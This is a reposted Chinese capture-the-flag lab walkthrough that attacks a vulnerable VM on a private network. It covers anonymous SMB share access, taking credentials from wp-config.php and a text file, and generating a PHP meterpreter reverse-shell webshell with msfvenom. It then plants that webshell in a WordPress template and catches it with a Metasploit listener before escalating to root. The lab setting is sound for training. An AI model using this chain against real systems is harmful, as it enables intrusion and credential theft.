• 首页 首页 icon
  • 工具库 工具库 icon
    • IP查询 IP查询 icon
  • 内容库 内容库 icon
    • 快讯库 快讯库 icon
    • 精品库 精品库 icon
    • 问答库 问答库 icon
  • 更多 更多 icon
    • 服务条款 服务条款 icon

SMB信息泄露

武飞扬头像
雨͕͐果͕͐
帮助4

SMB信息泄露

1.确保攻击机和靶机处在同局域网/ 首先使用ifconfig命令查看本机IP地址

学新通

2.使用 nmap -sn -PE 192.168.56.0/24命令然后扫出靶机IP:192.168.56.103

学新通

3.使用nmap -sV 192.168.56.103 命令扫描靶机开放的服务端口

学新通

我们发现目标靶机有22,80,139,445,3306,6667 几个可能有用的端口开放,其中139和445进行的SMB服务

其中,使用计算机名访问时,SMB服务工作在NetBIOS协议之上,用的是TCP的139端口;使用IP地址访问时,用的是TCP的445端口。

针对SMB协议弱点分析
4.针对SMB协议,使用空口令,若口令尝试登陆,并查看敏感文件,下载查看:
smbclient -L IP           //查看SMB文件目录
smbclient '\\IP\$share'   //查看SMB文件
get 敏感文件               //下载文件
5.针对SMB协议远程溢出漏洞进行分析
searchsploit samba版本号 //搜索smb远程溢出漏洞
6.使用命令: smbclient -L 192.168.56.103尝试空口令登录

学新通

7.使用命令:smbclient '\\192.168.56.103\share$' 空命令进入查看目录

学新通

8. 注意本目录下的deets.txt和wordpress目录下的wp-config.php ,这里将其下载到kali上

学新通

学新通

9. 打开deets.txt文件,找到一个密码信息:12345 也许有用

学新通

10.打开 wp-config.php文件,里面存有数据库的一些配置信息,我们找到数据库的账号密码。

学新通

使用命令:searchsploit samba版本号 尝试搜索存在的漏洞 发现不存在

学新通


深度挖掘

针对HTTP协议弱点分析
1.浏览器查看网站
2.使用dirb或nikto探测
3.寻找突破点,目标登陆后台,上传webshell

dirb http://192.168.56.103     //查看靶机目录
1.发现可疑目录,尝试浏览器打开

学新通

2.使用刚才 wp-config.php文件中的用户 密码 发现成功登录

学新通

3.我们进入了后台之后,在kali制作webshell 使用如下命令
 msfvenom -p php/meterpreter/reverse_tcp lhost= 本机IP lport=4444 -f raw

将制作好的webshell保存在桌面,以便使用
学新通

4. 启动metasploit,然后启动监听:
msfconsole                           //启动metasploit
msf > use exploit/multi/handler      //调用模块
msf exploit(handler) > set payload php/meterpreter/reverse_tcp    
msf exploit(handler) > set lhost kali机IP
msf exploit(handler) > set lport 4444           //端口
msf exploit(handler) > run

学新通

5.kali正在监听4444端口,接下来,我们上传webshell。打开火狐浏览器,进入后台页面,将404模板跟换为改成的webshell

学新通

6.接下来进入kali 发现监听成功 然后进入shell,发现用户权限不够,于是想到提权

学新通

python -c "import pty;pty.spawn('/bin/bash')"       #美化shell改成终端模式
7.使用命令 cat /etc/passwd查看用户信息,发现home目录下存在togie用户
cat  /etc/passwd
landscape:x:103:109::/var/lib/landscape:/bin/false
togie:x:1000:1000:togie,,,:/home/togie:/bin/rbash
sshd:x:104:65534::/var/run/sshd:/usr/sbin/nologin
mysql:x:105:113:MySQL Server,,,:/nonexistent:/bin/false
8. 我们切换成该用户,使用deets.txt的密码12345,成功切换

学新通

9.尝试切换root用户,进入root目录

学新通

10.cd到root目录,看到有proof.txt文件,打开文件拿到flag

学新通

这篇好文章是转载于:学新通技术网

  • 版权申明: 本站部分内容来自互联网,仅供学习及演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,请提供相关证据及您的身份证明,我们将在收到邮件后48小时内删除。
  • 本站站名: 学新通技术网
  • 本文地址: /boutique/detail/tanhffibgi
系列文章
更多 icon
同类精品
更多 icon
继续加载